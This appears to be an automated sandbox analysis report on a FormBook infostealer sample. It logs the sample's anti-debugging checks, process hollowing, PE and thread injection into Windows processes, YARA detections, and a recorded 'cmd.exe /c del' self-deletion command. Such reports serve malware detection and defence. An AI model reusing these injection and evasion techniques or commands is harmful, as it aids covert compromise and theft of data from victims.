          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DCF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DDA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DDA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DCB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DCB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E7070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E7070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DDE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E3FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E3FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DA4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DA4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E3B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DA58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DCB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DCB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DA40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DA40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DA40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DA9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DDF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DDF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DDF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E23884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E23884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DE90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DC0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DC0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E71074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E62073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DCA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DCA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DCA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DCA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DBB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DBB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DBB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DBB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E74015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E74015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E27016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E27016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E27016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E341E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DAB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DAB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DAB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E649A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E649A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E649A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E649A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E269A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DD2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DDA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\DpiScaling.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\logagent.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\msdt.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F995D0 NtClose,LdrInitializeThunk,

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          Sample uses process hollowing techniqueShow sources
          Source: C:\Windows\SysWOW64\DpiScaling.exeSection unmapped: C:\Windows\SysWOW64\colorcpl.exe base address: 9A0000
          Source: C:\Windows\SysWOW64\DpiScaling.exeSection unmapped: C:\Windows\SysWOW64\msdt.exe base address: DC0000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Windows\SysWOW64\DpiScaling.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\DpiScaling.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\DpiScaling.exeSection loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\DpiScaling.exeSection loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\DpiScaling.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\DpiScaling.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\DpiScaling.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\DpiScaling.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: unknown protection: read write
          Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Writes to foreign memory regionsShow sources
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 72480000
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: EE0000
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: EF0000
          Source: C:\Users\user\Contacts\Ajshkennyc.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 72480000
          Source: C:\Users\user\Contacts\Ajshkennyc.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 980000
          Source: C:\Users\user\Contacts\Ajshkennyc.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 990000
          Source: C:\Users\user\Contacts\Ajshkennyc.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 72480000
          Source: C:\Users\user\Contacts\Ajshkennyc.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 2FB0000
          Source: C:\Users\user\Contacts\Ajshkennyc.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 2FC0000
          Allocates memory in foreign processesShow sources
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeMemory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 72480000 protect: page execute and read and write
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeMemory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: EE0000 protect: page execute and read and write
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeMemory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: EF0000 protect: page execute and read and write
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 72480000 value starts with: 4D5A
          Source: C:\Users\user\Contacts\Ajshkennyc.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 72480000 value starts with: 4D5A
          Source: C:\Users\user\Contacts\Ajshkennyc.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 72480000 value starts with: 4D5A
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Windows\SysWOW64\DpiScaling.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Windows\SysWOW64\DpiScaling.exeThread register set: target process: 3424
          Source: C:\Windows\SysWOW64\DpiScaling.exeThread register set: target process: 3424
          Source: C:\Windows\SysWOW64\DpiScaling.exeThread register set: target process: 3424
          Source: C:\Windows\SysWOW64\DpiScaling.exeThread register set: target process: 3424
          Source: C:\Windows\SysWOW64\colorcpl.exeThread register set: target process: 3424
          Creates a thread in another existing process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeThread created: C:\Windows\SysWOW64\DpiScaling.exe EIP: EF0000
          Source: C:\Users\user\Contacts\Ajshkennyc.exeThread created: C:\Windows\SysWOW64\DpiScaling.exe EIP: 990000
          Source: C:\Users\user\Contacts\Ajshkennyc.exeThread created: C:\Windows\SysWOW64\logagent.exe EIP: 2FC0000
          Source: C:\Users\user\Desktop\Nova narudzba u prilogu.exeProcess created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exe
          Source: C:\Users\user\Contacts\Ajshkennyc.exeProcess created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exe
          Source: C:\Users\user\Contacts\Ajshkennyc.exeProcess created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\DpiScaling.exe"
          Source: explorer.exe, 00000006.00000000.755276192.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.734471103.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.800820766.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.719106933.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000006.00000000.802547452.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.734691170.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.756196706.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.719321064.0000000001080000.00000002.00020000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000006.00000000.743443342.0000000005E50000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.761662978.0000000005E50000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.722640032.0000000005E50000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.802547452.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.734691170.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.756196706.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.719321064.0000000001080000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.802547452.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.734691170.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.756196706.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.719321064.0000000001080000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000000.802547452.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.734691170.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.756196706.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.719321064.0000000001080000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000006.00000000.768231511.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.746630271.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.725780323.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Contacts\Ajshkennyc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 15.0.DpiScaling.exe.72480000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.0.DpiScaling.exe.72480000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DpiScaling.exe.72480000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.0.DpiScaling.exe.72480000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DpiScaling.exe.72480000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.0.DpiScaling.exe.72480000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DpiScaling.exe.72480000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DpiScaling.exe.72480000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DpiScaling.exe.72480000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.DpiScaling.exe.72480000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.0.DpiScaling.exe.72480000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.0.DpiScaling.exe.72480000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.0.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.2.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.0.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DpiScaling.exe.72480000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.2.logagent.exe.72480000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.DpiScaling.exe.72480000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000000.810820140.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.980408969.0000000002C60000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.826394913.0000000004B90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.772008503.000000000E9DF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.714097353.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.979059154.0000000000800000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.749509351.000000000E9DF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000000.836253520.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.860879140.0000000000E90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000000.810315428.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.864516356.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000000.811363392.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.714755943.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.860188435.0000000000E60000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.844946988.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.714442633.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.980367511.0000000002C30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000000.811926457.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.713760138.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.826540547.0000000004BF0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.830080872.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000000.835723366.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.863247728.0000000003280000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000000.836796283.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000000.837305764.0000000072480000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 15.0.DpiScaling.exe.72480000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.0.DpiScaling.exe.72480000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DpiScaling.exe.72480000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.0.DpiScaling.exe.72480000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DpiScaling.exe.72480000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.0.DpiScaling.exe.72480000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DpiScaling.exe.72480000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DpiScaling.exe.72480000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DpiScaling.exe.72480000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.DpiScaling.exe.72480000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.0.DpiScaling.exe.72480000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.0.DpiScaling.exe.72480000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.0.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.2.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.0.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DpiScaling.exe.72480000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.2.logagent.exe.72480000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.DpiScaling.exe.72480000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000000.810820140.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.980408969.0000000002C60000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.826394913.0000000004B90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.772008503.000000000E9DF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.714097353.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.979059154.0000000000800000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.749509351.000000000E9DF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000000.836253520.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.860879140.0000000000E90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000000.810315428.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.864516356.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000000.811363392.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.714755943.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.860188435.0000000000E60000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.844946988.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.714442633.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.980367511.0000000002C30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000000.811926457.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.713760138.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.826540547.0000000004BF0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.830080872.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000000.835723366.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.863247728.0000000003280000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000000.836796283.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000000.837305764.0000000072480000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Registry Run Keys / Startup Folder1Process Injection812Masquerading11OS Credential DumpingQuery Registry1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
